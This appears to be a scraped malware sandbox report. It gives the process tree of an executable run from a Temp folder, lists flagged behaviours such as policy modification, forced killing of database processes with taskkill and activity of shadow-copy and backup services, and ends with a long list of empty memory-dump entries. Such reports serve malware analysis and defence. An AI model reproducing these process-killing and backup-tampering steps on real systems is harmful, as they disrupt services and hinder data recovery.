C:\Users\Admin\AppData\Local\Temp\64new_cip5.exe\\?\C:\Users\Admin\AppData\Local\Temp\64new_cip5.exe -network2⤵
- System policy modification
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c pause3⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2560 -s 37122⤵
- Program crash
-
C:\Windows\system32\taskkill.exetaskkill -f -im Ssms.exe1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill -f -im fdlauncher.exe1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 2560 -ip 25601⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/64-142-0x0000000000000000-mapping.dmp
-
memory/384-138-0x0000000000000000-mapping.dmp
-
memory/388-166-0x0000000000000000-mapping.dmp
-
memory/528-175-0x0000000000000000-mapping.dmp
-
memory/624-153-0x0000000000000000-mapping.dmp
-
memory/648-190-0x0000000000000000-mapping.dmp
-
memory/680-157-0x0000000000000000-mapping.dmp
-
memory/692-194-0x0000000000000000-mapping.dmp
-
memory/800-173-0x0000000000000000-mapping.dmp
-
memory/920-158-0x0000000000000000-mapping.dmp
-
memory/928-163-0x0000000000000000-mapping.dmp
-
memory/1096-162-0x0000000000000000-mapping.dmp
-
memory/1132-144-0x0000000000000000-mapping.dmp
-
memory/1232-180-0x0000000000000000-mapping.dmp
-
memory/1352-177-0x0000000000000000-mapping.dmp
-
memory/1372-137-0x0000000000000000-mapping.dmp
-
memory/1524-145-0x0000000000000000-mapping.dmp
-
memory/1528-171-0x0000000000000000-mapping.dmp
-
memory/1588-176-0x0000000000000000-mapping.dmp
-
memory/2112-179-0x0000000000000000-mapping.dmp
-
memory/2156-167-0x0000000000000000-mapping.dmp
-
memory/2204-174-0x0000000000000000-mapping.dmp
-
memory/2324-141-0x0000000000000000-mapping.dmp
-
memory/2380-132-0x0000000000000000-mapping.dmp
-
memory/2392-147-0x0000000000000000-mapping.dmp
-
memory/2492-146-0x0000000000000000-mapping.dmp
-
memory/2676-148-0x0000000000000000-mapping.dmp
-
memory/2840-150-0x0000000000000000-mapping.dmp
-
memory/2928-182-0x0000000000000000-mapping.dmp
-
memory/3008-172-0x0000000000000000-mapping.dmp
-
memory/3064-168-0x0000000000000000-mapping.dmp
-
memory/3128-159-0x0000000000000000-mapping.dmp
-
memory/3288-184-0x0000000000000000-mapping.dmp
-
memory/3312-156-0x0000000000000000-mapping.dmp
-
memory/3392-195-0x0000000000000000-mapping.dmp
-
memory/3456-181-0x0000000000000000-mapping.dmp
-
memory/3476-192-0x0000000000000000-mapping.dmp
-
memory/3560-149-0x0000000000000000-mapping.dmp
-
memory/3572-152-0x0000000000000000-mapping.dmp
-
memory/3616-185-0x0000000000000000-mapping.dmp
-
memory/3664-151-0x0000000000000000-mapping.dmp
-
memory/4036-164-0x0000000000000000-mapping.dmp
-
memory/4060-169-0x0000000000000000-mapping.dmp
-
memory/4208-133-0x0000000000000000-mapping.dmp
-
memory/4240-143-0x0000000000000000-mapping.dmp
-
memory/4296-191-0x0000000000000000-mapping.dmp
-
memory/4332-161-0x0000000000000000-mapping.dmp
-
memory/4336-155-0x0000000000000000-mapping.dmp
-
memory/4392-193-0x0000000000000000-mapping.dmp
-
memory/4408-178-0x0000000000000000-mapping.dmp
-
memory/4776-186-0x0000000000000000-mapping.dmp
-
memory/4840-140-0x0000000000000000-mapping.dmp
-
memory/4844-188-0x0000000000000000-mapping.dmp
-
memory/4860-187-0x0000000000000000-mapping.dmp
-
memory/4892-183-0x0000000000000000-mapping.dmp
-
memory/4904-135-0x0000000000000000-mapping.dmp
-
memory/4928-136-0x0000000000000000-mapping.dmp
-
memory/4940-189-0x0000000000000000-mapping.dmp
-
memory/4952-170-0x0000000000000000-mapping.dmp
-
memory/4956-134-0x0000000000000000-mapping.dmp
-
memory/5076-139-0x0000000000000000-mapping.dmp
-
memory/5100-165-0x0000000000000000-mapping.dmp
-
memory/5104-154-0x0000000000000000-mapping.dmp
-
memory/5116-160-0x0000000000000000-mapping.dmp